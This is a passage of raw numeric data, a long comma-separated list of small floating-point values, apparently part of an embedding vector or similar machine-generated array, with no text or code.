7,0.0066902675,0.0060662497,-0.08439482,0.0200826,0.026493667,-0.014625415,0.004099027,0.01507782,0.0041534905,-0.006301643,0.011008121,-0.017865006,0.013830112,0.025390046,-0.007488197,-0.013961079,-0.01748838,0.026288124,0.015475877,-0.026489861,0.021032732,-0.006262413,-0.029434774,0.003277612,0.017750336,-0.008761464,-0.0055225394,-0.024281379,-0.0049850373,0.008106328,0.0057297423,-0.009636831,0.0054274336,0.0063639227,0.0053407755,-0.009727168,0.009596691,-0.011533271,-0.02358812,0.01559707,0.035469804,0.0030087382,-0.007673028,0.014388231,-0.0040574404,0.018950198,0.012909783,-0.006466389,0.016963422,-0.01809431,0.011130622,0.016736839,0.013438368,0.0018823886,-0.04293333,-0.0016108865,-0.0031115324,-0.046560768,-0.009555481,-0.0077815284,-0.011554039,0.003836637,0.016238613,0.0012285104,0.018103734,0.006498626,-0.010019909,-0.0030198758,0.0067253117,-0.019546777,-0.016024599,-0.0011154637,-0.01075369,0.027428055,-0.008168892,0.015496877,0.009549415,-0.012042026,0.022460481,0.03693444,0.0074606882,-0.002195986,-0.009741678,-0.03751477,0.02642099,0.009558033,-0.011877666,0.001384437,-0.024482107,0.008781742,-0.020647015,0.0088602705,0.009852054,-0.011306601,0.015975079,0.0037144192,0.0042909877,0.00539963,-0.029793356,0.002319217,-0.0029210038,0.018303094,0.022434007,-0.002157712,-0.009209717,-0.016331643,0.01635811,0.03263176,-0.012533903,-0.010143077,0.012364121,-0.0024965699,-0.027666844,0.017867303,0.0010716472,0.012488384,0.023232851,0.006858181,-0.013414307,0.021464374,0.0075242305,-0.04000241,0.0019676688,-0.015913349,0.009366482,0.0050500147,0.046732105,0.0009207221,-0.0048647337,-0.025989434,0.00018012601,0.0006844377,-0.004706262,0.0057623396,-0.0055790087,0.0043381387,0.010391875,0.011789509,-0.0022320044,-0.027750246,0.008081834,0.012354512,-0.02236202,-0.0060613295,-0.009996559,-0.0045721647,0.0030038895,0.014553347,-0.013579699,0.016034288,0.009768348,0.06962567,0.008604406,0.0068254736,-0.009835933,0.017655112,-0.010419843,0.050628547,0.016621329,0.0022889953,-0.0018777628,-0.013885957,-0.017585682,-0.008276811,0.026711648,0.00070422725,0.000023890681,-0.032017294,0.022863304,-0.018992452,-0.008974114,0.033214364,-0.0044227177,-0.026414784,0.0051239547,0.03437213,0.01853336,0.0010447955,-0.027850054,-0.0048409514,-0.013347434,-0.016132051,-0.008263893,-0.0041604787,-0.0077289296,-0.017983776,0.00031811467,-0.006154295,-0.0023693105,0.007423023,-0.0072670877,-0.0048114895,-0.0015993026,-0.019693686,-0.0007327946,-0.011081309,0.034731664,0.018026158,-0.0031229195,0.0014758292,0.0025320475,0.005144099,0.026227854,-0.030583724,0.02635637,-0.0039033815,0.028245334,0.0033137521,-0.028212616,0.023510836,0.017070001,0.015469489,0.018251037,-0.04028175,0.017477863,-0.004896007,0.046433587,0.010298935,0.0037339453,-0.01232649,-0.017677136,-0.01012727,0.032215834,-0.0067022755,0.012364194,-0.01150175,-0.0010177933,-0.010680467,-0.015726686,-0.00010311315,0.025442434,0.009175057,0.023443822,-0.004572875,0.026142797,-0.013543642,-0.021082494,-0.006094286,-0.017562857,0.020142805,-0.015516368,0.024122097,0.011451733,0.025509587,-0.03220487,0.009003341,-0.03791123,0.024877843,-0.024846697,0.0052655065,0.0028433495,-0.030018574,0.0036815552,0.008887944,-0.016777936,-0.020681424,-0.009394988,0.00053337635,-0.021984397,0.0056800325,0.011201092,-0.013619239,-0.0023089927,-0.018531121,-0.0025928668,0.004944218,-0.01234235,0.0054383334,0.009851693,-0.0073737353,0.031729374,0.0203433,-0.0011618504,-0.0045729275,0.0101198265,-0.032464873,0.017438417,0.0001633314,-0.017306825,0.01324378,0.026461633,0.0029901604,-0.005689292,-0.0043746266,-0.0215152,-0.012000275,0.019353421,0.0069316085,-0.013946977,0.04139371,0.009292751,0.0005107954,-0.006081946,0.02437542,0.023576919,0.00026184425,0.0094477255,0.012024078,-0.004459061,0.01490903,0.0076026823,-0.009545042,-0.018829165,0.019092042,-0.009896632,-0.0189767,0.007536751,0.006567658,-0.0032709925,-0.017496282,0.0015831236,0.03110358,-0.013787682,0.014693077,0.00095622387,-0.009062324,0.0070795775,0.004129719,0.07192767,-0.008123411,-0.018149002,-0.009841292,0.017178547,-0.01869678,-0.008652013,0.0005349769,-0.011139066,0.009083426,-0.0023631235,-0.006395275,-0.013088324,0.009282076,-0.033847507,0.005093256,0.03106936,-0.014747886,-0.015156457,-0.010791453,-0.0070188125,-0.005878572,-0.01803367,-0.043932617,-0.026431937,-0.009073094,0.03199276,0.0025502965,0.006741542,-0.002257936,-0.015126837,-0.007911783,-0.004766771,-0.0011028129,0.017876454,-0.00885034,-0.015110784,0.011864848,-0.01402736,0.04203053,0.0044475496,-0.015210404,0.025133178,0.012477327,0.0057330737,-0.000056432615,-0.018260024,-0.010322461,0.010805856,0.0036566085,-0.028113265,0.0154704,0.010647571,-0.0027520275,0.0012461155,-0.009862536,0.02075859,0.014872725,0.0018911385,0.015128007,0.020873535,0.03864016,-0.008091857,-0.03303285,0.007736017,-0.018451516,0.023134397,-0.0036802937,-0.0043032123,-0.018879965,0.021848511,0.0076264124,0.0016073333,0.00688501,0.0055746078,0.0053042793,0.0066679586,0.028838677,0.03180549,-0.019733131,0.003412798,0.028611293,0.003455632,0.015447328,0.00092088,-0.0139398435,-0.003306375,0.02580498,-0.00088846294,-0.031788845,0.03460154,0.01315212,-0.005660873,-0.010399201,0.028742023,-0.0006987223,-0.0059776353,-0.005791412,0.0076233395,-0.009767168,-0.0076415855,-0.03786932,-0.00089708297,0.044335965,-0.0098492885,0.008794968,-0.0014444174,0.004669638,0.016698936,-0.014846681,0.012403156,-0.086307846,0.012196368,0.019720348,0.010478734,-0.018385757,0.044504806,-0.027017994,0.014041536,-0.008127363,-0.007035334,0.0106487945,-0.020442626,0.008663344,0.010618663,0.029431315,0.0044496744,-0.01106142,-0.02572164,-0.00734919,-0.06861079,-0.0062140003,0.040841367,-0.022269139,0.013262802,0.002407386,0.0020933133,0.007299334,0.019026006,0.0075551034,-0.006093468,-0.0053743906,0.003242356,0.011776482,0.00056928396,-0.023978263,0.0029477456,-0.0038511634,0.013046296,-0.010647998,-0.008298099,0.02516501,-0.022172222,-0.0052374215,-0.007886224,-0.022123264,0.017824367,-0.013137225,0.028018154,-0.020520346,0.02078766,-0.0073327883,-0.010559783,0.016330281,0.0035003687,-0.0020282315,-0.007679724,-0.0040692072,0.036857847,-0.009278,-0.0060550584,0.0022024915,-0.0039775437,-0.0040242686,-0.009744301,-0.014492012,0.009147624,0.013314373,-0.012456127,-0.0075133974,0.009613929,-0.0061087986,0.020894846,0.012500396,-0.012954346,0.019086089,0.010675258,0.01581054,0.0068622786,0.011960435,0.0008330324,0.0065077576,-0.018293032,-0.024230478,0.01890617,-0.0063598575,-0.014733484,0.02734026,-0.006725268,-0.00962974,-0.029090548,-0.0063631497,-0.008640934,-0.010545968,0.0032683532,-0.0007308625,-0.007458341,-0.009699089,-0.032283258,0.008375205,0.019868817,0.021130204,-0.013620703,-0.035396475,-0.0133929895,-0.0062697246,-0.0054722787,-0.0061818943,-0.00028812766,-0.0035850916,0.02930552,-0.008696417,-0.007019265,-0.010135496,0.011542622,-0.003112029,0.018199865,0.0024716768,0.01353546,-0.00023855058,-0.023151366,0.004781254,0.022037044,-0.006055861,-0.006916991,-0.0014934879,0.021932263,-0.007516112,-0.016962875,-0.008546322,0.015906231,0.014406253,0.0005617101,-0.0231916,0.007852574,-0.018701745,-0.021544363,0.018721487,-0.01880955,-0.015030575,-0.007266334,0.0014630016,0.007267527,-0.020440439,-0.0072817225,0.03128758,0.009846425,-0.0000684998,-0.000675955,-0.0052589737,0.014442186,0.018942056,0.010750639,-0.028969733,-0.010714587,-0.032527372,0.03260598,-0.010249926,0.0034013602,-0.015631387,-0.0008480046,-0.009379829,0.0029514204,-0.0004704746,-0.0091566155,0.024631789,0.0046621966,-0.02609506,0.023354627,-0.0023610906,0.01428975,0.016815674,0.00017121878,-0.016679399,-0.022878917,-0.0035180135,-0.01495647,-0.02987543,-0.00051150494,-0.0249148,-0.017148826,0.016169902,-0.025918089,-0.009653326,0.0139271235,0.005388317,-0.00555988,0.0125448145,-0.013907982,0.0280918,-0.008801721,-0.000024923813,0.0014435216,0.01858948,-0.014954385,-0.004346528,0.014809457,0.01823042,0.02398556,-0.016035149,-0.007031591,0.03126287,-0.0009144721,-0.018745061,0.014579082,0.001284478,0.019722726,-0.018342407,0.0074200453,-0.016804699,-0.018210797,0.01805508,0.000118458425,-0.00299661,0.000020201065,0.0025578276,0.0185606,0.013242948,-0.010005906,-0.019620202,0.027944392,-0.007776176,0.00071144337,-0.0054543214,-0.00025341564,-0.0057800435,-0.011205987,-0.0092370575,0.03181597,-0.003595317,0.012085278,-0.019397585,-0.004951378,0.0059777517,-0.048521508,-0.0055432557,-0.004457476,-0.002002561,-0.0019155333,-0.0008581214,0.0076726177,0.0057174647,0.019805834,-0.009577019,-0.0049403086,-0.009282199,-0.029744204,0.012612744,0.0061655603,-0.033042394,-0.010798839,0.0054834783,-0.04325802,0.005966635,-0.00782084,0.013343812,0.0013337123,0.0030996935,0.0035374092,0.0034434986,-0.0037518218,0.022442974,0.015021878,0.0026822183,0.0029088126,0.03909948,0.010216671,-0.018444741,-0.01017527,-0.0006099032,0.015968831,-0.010328759,0.022789843,-0.009391291,0.017646004,0.0052453135,0.008718028,-0.007489363,-0.020286925,0.014139372,-0.01712047,0.009917115,0.0068064453,0.00420007,-0.01912014,0.0068426547,-0.027903657,-0.0076267165,0.015761664,-0.010042895,0.009001159,-0.0031018525,0.024739642,-0.0026662815,-0.01789901,0.011998732,0.006290207,-0.030548835,0.0224019,0.012732708,-0.009940244,-0.012787872,0.007526841,-0.01610078,0.005486591,0.02488943,-0.0041893614,-0.014073673,-0.012135871,-0.0034562186,-0.00629469,0.007548482,0.0051187575,-0.036133748,0.009787924,0.009312935,-0.0019820451,-0.0029408124,0.01367604,0.012380294,-0.009156951,0.0029725602,-0.010838075,0.017481772,0.0052346494,-0.0043366137,0.010163391,-0.0020175797,0.012901234,0.019993227,0.0060842056,-0.007949817,-0.03611837,0.0024447807,0.012090122,-0.0043176813,0.004236318,0.0058552283,0.0072840224,-0.014440426,0.040557545,0.0025538432,-0.020334303,0.0018512073,0.004996795,0.0007035693,-0.007186532,0.015814492,-0.009459805,0.0059255124,0.02570628,0.008292404,0.020257313,0.0053688404,0.0025948663,-0.016922938,-0.007413221,0.008964455,-0.010355575,0.009187793,0.015778303,-0.026472352,-0.0030994883,0.023932755,-0.0016708676,0.005017596,-0.005133048,0.0016737782,-0.012967581,-0.00695266,0.010487679,-0.016345803,0.022125643,0.00029197955,-0.02047545,-0.0054735267,-0.0027768514,0.005046967,0.0100654345,-0.012795115,0.016858475,-0.00333793,0.018112551,-0.008254926,-0.00491751,0.0010850001,-0.0096457135,-0.01502824,-0.02375725,-0.0046999482,0.014802417,0.010359436,0.026266476,-0.0072202617,0.05612133,0.0111655975,-0.01345996,0.01267468,-0.013584435,-0.018970467,0.018922066,-0.013352885,0.00050610746,-0.010907298,-0.015103212,0.01931346,0.023190299,0.0046468102,-0.010215252,0.02921556,0.0029508322,-0.0024893177,-0.020514753,0.0011861995,0.029996144,0.068406254,0.005254761,0.0058661657,-0.009320604,0.0075895637,0.018960215,-0.0018980143,-0.016334908,0.019556891,-0.00009225481,-0.011134771,-0.0018366239,-0.008593418,-0.005979103,0.0019026774,-0.010356356,0.008753775,-0.011230116,-0.0008088009,-0.0015452916,-0.0053700153,-0.0032195204,0.0040127006,-0.029234676,-0.018539304,-0.0135480985,-0.008212518,-0.015620478,-0.008376898,0.019529413,0.01208039,0.007931698,-0.0034050029,-0.023146218,-0.00031237357,-0.020168902,-0.014419989,0.008963382,-0.010759953,-0.015043883,0.0077292356,0.019478662,-0.016072229,-0.010682727,-0.005254727,0.0018041553,-0.014386613,-0.030879745,-0.010696776,0.013012715,-0.009274387,-0.016759645,0.00071292196,-0.013879771,-0.0020590185,0.025206037,0.019679755,0.00063672126,0.013505569,-0.022554478,0.00886124,-0.015541591,-0.0011236676,0.014237745,0.02631589,0.025517564,0.01584327,-0.0024121397,-0.025246719,-0.0023766197,-0.025117544,-0.024653899,-0.006641886,0.013038189,-0.011624523,-0.006865734,-0.015894951,-0.0011066142,0.0082537625,0.0058774278,-0.0108397715,0.007175903,-0.025575312,-0.0042090877,0.00740909,-0.021800056,-0.0034341065,-0.012850627,0.009484055,-0.012355177,0.02086519,0.0030792155,-0.03119108,0.0052926517,-0.0146257,0.009492079,-0.024416413,-0.026790278,-0.026070789,-0.008741775,0.0024208107,-0.026163578,0.017562848,0.00859818,0.009992049,-0.018360948,-0.023102893,-0.02075697,0.0048977192,0.012933155,0.0013309605,-0.0014095841,0.026033895,-0.0355376,0.05190234,-0.014757275,-0.031381406,0.0035383594,-0.004563563,0.0031124619,-0.01007007,-0.03813925,-0.004409151,0.009903488,0.015915839,0.021190409,0.020532612,0.02308484,0.025685214,-0.00822695,-0.011421019,0.015028933,-0.011100484,-0.0052539418,-0.0027326501,-0.01446466,-0.0088730585,-0.020591298,-0.006369137,-0.016861964,-0.014351651,0.006991687,-0.001549892,-0.008785546,-0.012074255,0.0064073144,0.025742805,-0.005893429,0.01771219,0.015757546,-0.0195168,-0.00056240155,0.012870334,0.01068175,0.0070482646,-0.0033941125,-0.017239643,-0.0123735005,-0.012331986,-0.008227545,0.013444374,0.0016969539,-0.014563096,0.002216612,0.023533473,-0.01608917,-0.0053566936,0.028950216,-0.006037752,-0.035494015,0.014155814,-0.013606957,-0.007939334,0.006133283,0.002006225,0.010981126,0.0070989043,-0.036964443,0.008122231,-0.014150465,0.011215128,-0.033886947,-0.0012200103,-0.031141646,-0.004695832,-0.024611989,-0.028244501,0.012369694,-0.0014341993,0.013703799,0.00020101255,0.0050576,-0.029307252,-0.011951533,0.017164437,-0.031164734,0.013953948,0.0095766,-0.0023658518,0.005492507,0.014221338,0.0036491493,0.002615159,0.00007889401,-0.013453706,0.0021179407,0.0008059913,0.034946863,0.010110244,0.019613426,0.009967472,-0.0004550804,-0.0064080143,-0.0013619768,-0.016090143,0.0020975077,-0.015432842,0.011942406,0.007134162,0.003875129,-0.0046729934,-0.01683128,0.023471316,-0.033103194,0.08207643,0.0036108166,0.004731622,0.014850784,0.00020329656,0.021750689,0.037966304,-0.011643437,0.042626247,0.021486579,0.007612487,-0.013327459,-0.005510557,0.014599625,0.016017014,0.0026951614,0.022622442,0.0071569677,-0.0009474714,0.0007556542,-0.018138962,-0.006201974,0.005677193,-0.013576276,0.0011102053,0.0014822724,0.0061949827,-0.008198118,-0.010397716,0.021403115,0.0047089425,-0.012307168,0.015631808,0.019180568,0.044689815,-0.003032216,-0.0065151756,-0.010282305,-0.003960575,-0.025585832,0.034218263,-0.023509312,-0.006870427,0.00749304,0.010683709,-0.025718972,0.077509865,0.019451877,0.012396206,-0.017696526,0.010604377,0.011357421,-0.0068058674,0.014663175,0.008269266,0.0035808512,0.0012343953,0.001117945,0.009102525,0.017338982,0.00932659,-0.0054373266,0.004529946,-0.00031467248,0.0040389216,-0.025565907,-0.009792353,-0.009507775,0.0041621467,0.00024140389,-0.013236492,0.016085062,0.010321259,0.011262858,0.023888001,-0.007137991,-0.014401513,0.005620924,0.0071089687,0.04610687,-0.01063279,-0.059469648,0.016073527,0.15604036,0.008710034,0.033898428,0.011192498,-0.016213803,0.0033239045,-0.042819146,0.0025992556,-0.0010182924,-0.017906792,0.0032428259,-0.024622677,-0.01734698,0.020010684,0.015122238,0.0025297822,-0.0041684243,-0.032225814,0.004294493,-0.0028095858,0.004977897,-0.002524845,0.0004968524,0.012645019,-0.02205795,-0.0043666256,0.026888615,0.005869238,-0.015090696,0.009667645,0.010527005,-0.0006326442,0.008036736,-0.0062626367,-0.024741972,0.0045743417,0.0046804235,0.013274649,0.005171396,-0.02346133,-0.0034367996,-0.0033189177,-0.018769475,-0.020086836,-0.13475098,0.005746696,0.03265974,-0.014652158,-0.0012763877,0.015284087,-0.005224028,-0.043359492,0.0132612195,-0.051492598,0.003568236,-0.015958838,0.00066590024,0.015217576,-0.013278864,-0.0025487426,-0.023868555,0.0073943147,0.014892476,0.004641077,0.019893037,0.02935912,-0.0059064194,-0.021284522,-0.0018001291,-0.0054429416,-0.028384686,-0.012057016,-0.007625713,0.003582245,-0.016996684,0.019820176,-0.00050028367,-0.007588113,-0.022598028,-0.006869766,-0.02568554,0.022448217,-0.011842251,0.0061887433,0.019801741,-0.0048817648,-0.008288002,-0.008694674,-0.0072649666,0.01744476,0.0028428575,0.020151904,-0.0010682284,0.016638435,0.04056068,-0.012667625,-0.027468773,-0.0049529327,-0.0022422466,-0.013174059,-0.017318303,-0.021531845,-0.004043902,0.0098213265,0.0078316545,-0.027215887,-0.018299345,-0.0089555215,0.026909351,-0.01179516,0.010352963,-0.020233275,0.0011571825,-0.014560366,-0.015283686,0.00891836,0.00067262433,-0.014858286,0.033380054,0.02087071,-0.000096987176,0.01229953,0.008653326,-0.0042825425,-0.019809514,-0.021378115,0.007842059,-0.007826208,-0.0123723475,-0.004017097,-0.008998162,-0.015393257,-0.0148877725,-0.010670234,0.019074963,0.005312275,0.010101244,0.011511298,-0.009600123,0.012267142,0.011409945,0.007820079,-0.04215928,0.014327902,0.008017604,-0.021588437,-0.012993517,-0.0036241948,-0.013496349,0.0062329504,-0.0049558133,-0.035478003,-0.014230369,0.0039301733,0.015455072,0.017407764,0.009473591,-0.022019638,-0.025094502,-0.033536147,0.016780559,0.0021963923,-0.0038486249,-0.009534777,-0.04214816,-0.016166542,-0.013993976,0.0048745293,0.03871917,-0.012525515,-0.025641154,-0.0007585484,0.002884418,-0.029707255,0.011432422,0.0012786287,-0.013371415,0.021531092,-0.008209506,0.017359206,-0.021296244,-0.01797832,-0.026003733,0.011082147,0.008620368,-0.018328285,-0.014428853,-0.031507205,0.01855611,0.0025610921,0.033484835,0.0031412926,0.020071551,-0.002041699,-0.005228704,0.036846563,0.0037844533,-0.012968548,-0.011797579,0.093630634,0.0015770803,-0.027119653,0.010743702,-0.0037997935,0.00062598125,0.02771827,-0.019701306,-0.019311942,-0.017192304,-0.02114875,0.0016832908,-0.015257127,0.015864396,-0.013897281,0.0043009087,0.004720814,0.025677184,0.005391113,-0.0045925337,0.00095439213,-0.02390873,-0.02337863,0.022579309,0.019864047,-0.008409937,-0.011329825,-0.00680554,-0.01436517,0.0010416794,-0.00048177104,0.0012056938,0.0024628176,-0.009642496,0.0047006747,-0.041649915,-0.005905722,-0.000069986294,-0.0057901526,-0.0086077405,0.01319188,0.009373983,0.009295345,-0.031342078,0.016309544,0.010188427,-0.01448889,0.017745094,0.00022736393,-0.0052157985,-0.0015591274,0.021481747,0.015701368,-0.030559208,-0.006447464,0.0017731977,0.008777736,0.0033911364,0.0074355127,0.0026804095,0.008263541,-0.009664819,0.015498864,0.005009161,0.010447819,0.00030571426,-0.001213233,0.026930075,-0.0077959276,0.019951098,-0.011792328,0.00822816,-0.0020078055,0.015899312,0.008440692,-0.016150568,-0.014594585,-0.01299803,-0.03054885,-0.014563379,-0.0007339744,0.013891825,0.007275523,0.00057640224,-0.025910625,-0.06944267,0.012316276,-0.01272939,-0.019195681,0.018547587,0.013477969,0.0086681,0.022690885,-0.014709119,-0.012196487,-0.025090998,-0.012859734,0.0079166675,0.022320641,-0.019251978,0.013020765,0.028519165,-0.005000668,-0.010943,-0.010471918,-0.03570639,-0.017945485,-0.03510491,-0.008513117,-0.017069168,-0.017043408,-0.0037723717,0.011105805,-0.02841178,-0.0075294897,0.05540797,-0.023240672,-0.00550829,0.015878081,-0.03030754,-0.012829514,-0.00686451,0.008382738,-0.004122737,0.03602898,0.00070468296,0.003347325,0.014394724,-0.005327651,0.024978498,-0.022197824,0.047833625,-0.016180161,0.013024453,0.01410414,-0.006979971,0.007909066,0.0104129,0.018858757,-0.0038637791,-0.021247217,-0.00094242883,0.029280562,0.008866621,-0.003693113,-0.0024995392,0.021379964,0.011375195,-0.020831581,0.008021824,-0.024063276,-0.018417494,0.0003879318,-0.0013295416,0.0017162759,-0.0034998383,-0.021723602,-0.0007915357,-0.003439643,0.0045231697,-0.0162678,0.01185336,0.015139911,-0.00038825977,-0.019796006,0.012385504,0.009621889,-0.009989178,0.0064629777,0.001686756,-0.016082358,-0.02112765,0.025052343,0.0142064495,-0.00024163544,0.017592728,-0.0046291896,0.0021146773,-0.02516459,0.007843455,0.019108035,0.0117605515,-0.019383002,-0.015235322,0.025089115,0.012369178,0.0065230117,0.022401832,0.001262953,0.0005933379,0.005294065,0.0023356774,-0.0013814984,-0.026435591,-0.0057258154,0.001390986,0.025921328,-0.018402427,0.008784683,0.0059686443,-0.0049317023,0.034120742,0.0034325805,-0.042248018,-0.00941005,-0.0086925905,-0.012330464,0.008205868,-0.013094212,-0.009545485,-0.018139917,0.030887704,-0.013884653,-0.01838118,0.029772243,0.0058370773,-0.00052416243,0.009580401,-0.009224613,-0.009279992,0.006288385,-0.010351347,0.0071346173,0.0054120184,-0.025364913,-0.016863028,-0.013679651,0.09414303,-0.012920507,0.00003179837,0.007786419,0.016495695,0.01826619,-0.004028234,0.012482413,-0.025115453,0.011145628,-0.0041913274,-0.022016414,0.020756027,0.021847675,-0.0029803696,-0.026774742,0.014459192,0.010042393,-0.016826613,0.012027951,-0.004825561,0.008584698,0.015086779,-0.008245494,-0.024473984,-0.018916538,-0.014761825,0.0019595586,-0.03567205,0.012758651,0.0025548914,-0.00052431325,0.010447032,-0.0124210715,-0.005702074,0.009295549,0.004168423,0.006655276,-0.018715296,0.027737625,-0.010449777,0.0070392177,0.00043125547,-0.017904479,-0.023056656,-0.013751679,0.016372636,-0.00096587965,-0.01383324,0.027756805,-0.021497302,0.013025488,-0.011305345,-0.008789215,0.022078399,0.028543344,-0.0041046315,-0.017972087,0.019892035,0.021796249,-0.008889102,-0.023451464,-0.0066027716,-0.0058190594,0.021730391,0.02216698,0.009172496,-0.009749456,-0.029635068,-0.012185399,-0.021403322,0.032528486,0.014536049,0.0119449,-0.0044020074,-0.009613828,-0.0017950444,-0.002702787,0.012717864,0.013872863,-0.020904385,0.01312868,-0.011171082,0.0016238597,-0.003912757,0.0132042505,-0.037852217,-0.019529663,-0.026077077,-0.0073727104,0.0059352946,0.022915509,-0.015888995,0.0033424243,0.00096091646,-0.0063420595,0.012835516,0.01720264,-0.0065988745,-0.018020866,-0.002288532,-0.024394576,0.01401193,0.022234248,-0.012707192,-0.0028503542,-0.08650991,0.0029129665,0.0078129275,-0.032218866,-0.016106214,-0.01480937,0.040824555,0.088369064,0.014782063,-0.033031352,-0.0054961652,0.02842983,0.0029993088,-0.0018991027,-0.0053939484,-0.00095039257,0.010443847,0.0009159013,0.022819852,0.0089348145,0.00030384373,-0.004086187,-0.0016115581,-0.02197689,-0.0054231896,0.0035384456,-0.0085434895,0.007383814,-0.0055863396,0.011406068,-0.03474426,-0.0126987295,-0.0075422907,0.009301904,-0.018963482,0.00920488,0.0014564312,0.008313025,-0.022387125,-0.004093489,-0.0098764915,-0.021488238,0.0025366107,0.030382494,0.004620487,-0.009789107,0.012574443,-0.0052190465,0.010751825,-0.015533566,0.0011100208,-0.015984276,0.034790404,-0.0054741674,0.009448867,0.0010231774,-0.037303105,0.025488112,0.021338953,-0.0010792164,0.011536602,0.015487679,0.013271993,-0.01781207,0.014756838,0.0005460631,0.025235835,-0.01803024,-0.028394355,-0.013235663,-0.01549199,0.018796815,0.0072327876,-0.0022162357,0.0016676985,-0.0045503206,0.005044763,-0.0035739776,0.0040446697,0.02097736,-0.028228937,-0.012859969,-0.012474335,0.01953619,-0.0029413118,0.013835173,0.001186107,0.0058060344,-0.032171544,-0.010746218,0.003481623,0.00081470533,-0.017839544,-0.035247974,-0.008763429,0.0040125162,0.0016160385,0.03738232,0.013652357,0.0025187375,-0.0046181274,-0.008292688,-0.012168219,-0.021440716,-0.117946945,0.008732685,0.0059942254,0.015985742,-0.010924633,0.002415617,0.0069969967,-0.00080143596,0.026316747,0.0004425569,-0.00019807577,0.01362289,0.020708231,-0.0034203609,-0.0053387918,0.0124862585,-0.03024134,0.015741877,-0.0013347387,-0.006475982,0.0053428723,-0.004074253,-0.01803727,-0.009501245,0.012350412,-0.01147917,-0.015274656,0.017221862,0.010979692,-0.024877183,-0.013547636,-0.005623169,-0.0078689605,0.026709775,-0.0031060164,-0.016591858,-0.005218121,0.0086874915,0.00952552,0.013517383,0.016781773,0.012625565,0.0029343884,0.0031426153,-0.0035032898,0.01674739,-0.01822402,0.006449451,0.028162137,-0.011209675,-0.0073195435,0.0022816635,-0.015850551,0.008762191,-0.0046737087,-0.022584833,-0.013072711,-0.0036614882,-0.010045257,0.021774042,-0.011695316,-0.008518782,0.0051462604,-0.0075438307,-0.010046404,0.026234254,-0.0006285886,-0.000726975,0.018502826,0.002589327,-0.008903414,0.0092789605,0.021838339,0.00040808317,0.03529481,0.008394181,-0.020642936,0.013742741,0.039252806,-0.013362326,-0.019595573,-0.011912495,-0.015042414,0.015592874,-0.0082662245,-0.019080421,0.0032839384,0.022267913,-0.000040249026,0.003444885,0.0052684257,0.028561613,-0.021484671,-0.0019937446,0.011103395,0.0065609007,0.015493575,0.016740846,0.005021945,-0.018088618,-0.01028789,-0.008199608,0.0006967235,0.010439255,-0.0157869,0.0037542903,0.002319648,-0.021165647,-0.0039922767,0.0019237265,0.025459511,0.0056199497,-0.027447695,-0.003094738,-0.02937565,0.020207774,0.0077738715,-0.01704084,-0.0073593664,0.009466064,-0.013426997,0.012754177,0.0037742248,-0.010901148,-0.017758708,-0.004835009,-0.016158001,0.021230947,-0.008162776,0.0044115535,-0.004226352,-0.0014617499,0.0083177,-0.0424939,-0.012968882,-0.008003899,0.0074016354,0.0047208774,0.0050375694,-0.005340042,-0.0065464373,-0.021292586,0.01629965,-0.007554009,-0.0036586395,-0.015233091,-0.010744134,-0.0039200187,-0.010251818,0.007947249,-0.021307841,0.009642291,0.009501691,0.025713513,-0.023590215,0.016308459,-0.012899665,0.010915076,-0.020882377,-0.0067815613,0.002123173,-0.0006179877,0.016695613,-0.0018120386,-0.0014412461,-0.022430297,0.021484122,0.0008400656,0.0064745713,-0.0063792244,0.009088907,-0.012657908,-0.007764951,-0.021765556,0.01502412,0.007927872,0.039789785,0.015159639,0.0056260102,0.02125048,0.028168155,-0.010457458,0.003588601,-0.0041589616,-0.0014494495,-0.0019046651,0.0052725417,0.01236617,-0.002687317,0.017294796,0.010243169,-0.000738707,-0.010896467,0.009539958,0.02488153,0.0013504658,-0.0028494522,-0.0025634298,0.010622447,-0.03061915,-0.0031873079,0.04171503,-0.00043844426,-0.021817872,0.02842994,0.007991994,0.0006614731,0.03129706,0.022380615,0.00673853,0.0015257876,-0.0018177375,0.014405003,0.0029413414,0.015243964,0.03855737,0.00896197,-0.014921197,0.017475532,0.012688116,0.011367502,-0.0099081695,0.023731131,0.004469058,-0.0031267435,0.033996906,0.004036642,0.0020927358,0.018450035,-0.018659404,-0.0046975347,-0.00030460916,-0.0039601126,0.009861276,-0.0052006044,0.010206472,0.023477823,-0.005847221,-0.015507281,-0.0051339692,-0.025918461,0.02689347,0.012445082,0.000586572,-0.005637394,-0.0059390534,0.017784536,0.010541746,0.00313544,-0.0005952446,-0.0039548744,-0.016202413,-0.0017530485,0.0047024675,-0.009766629,-0.0011197857,0.021057084,-0.0077398513,0.0023084215,0.0072454712,-0.0040855794,0.00080813456,-0.0052123903,0.008274044,-0.021706235,-0.006283437,0.003665366,-0.012780624,0.004790063,0.014208153,-0.028074935,0.0019914373,-0.01227411,0.04323775,0.02524088,-0.005396808,-0.009128573,-0.013077541,-0.015844958,-0.0062367804,-0.017117623,-0.017585928,-0.015570539,-0.011569925,0.009026692,-0.014938457,-0.0011681255,-0.015293635,-0.006290371,-0.0006492349,0.0074210973,0.004076414,0.0069231587,-0.022161439,-0.026435431,0.013177571,0.018932689,-0.017045347,-0.0012393591,0.005819387,0.023843506,-0.018149681,0.011565941,0.026183963,-0.013021809,-0.0085087875,-0.0051696184,0.006205852,-0.031996913,-0.0002924939,-0.0036617566,-0.0035003985,0.017932327,0.019353563,0.003186209,-0.0065461537,-0.007650334,0.0032674123,-0.0067552775,-0.0078106388,-0.008468626,-0.019823885,0.03054441,-0.012546533,0.009868409,0.013942728,0.015745977,-0.022951266,-0.006405323,-0.013283029,0.02328555,0.09378324,0.0045598284,-0.018918376,0.021755438,-0.007635962,-0.010619814,0.019944115,0.0060343244,0.019639017,0.021401094,0.013390672,-0.0026551508,-0.00036445216,0.0012240334,-0.012970259,0.005555922,0.007237296,0.030045811,0.00415261,-0.01280425,0.0019726404,-0.0038725976,0.022896586,0.029667404,0.0030593197,-0.016196387,-0.00082286797,0.011579775,-0.003965792,-0.0306001,-0.0052715396,-0.021075005,0.004941646,-0.023371268,-0.0084134,-0.0126191145,0.005588353,-0.022748599,0.00575022,0.0006928815,-0.015426274,-0.00056137476,-0.003451976,-0.029071577,-0.062245205,0.028011292,0.023140488,-0.029487912,0.021192525,-0.0008775942,-0.01497845,-0.015932849,-0.0066247485,0.029762983,0.002052072,-0.017916718,-0.014183572,0.021791263,0.022002304,0.0007618389,-0.0057940595,-0.01830179,0.023455666,-0.008970421,-0.018259197,0.0236413,0.015918393,-0.012786789,-0.006089614,0.0011273844,-0.0154337995,0.0021965082,-0.023760865,0.0125102,-0.004114095,0.0027515441,-0.011061456,-0.019240573,-0.011017928,0.021144122,-0.0085742995,0.0043378957,0.015126898,-0.04315686,-0.014769823,-0.0029183486,0.011489357,-0.014926082,-0.00017900715,0.022287121,-0.0291684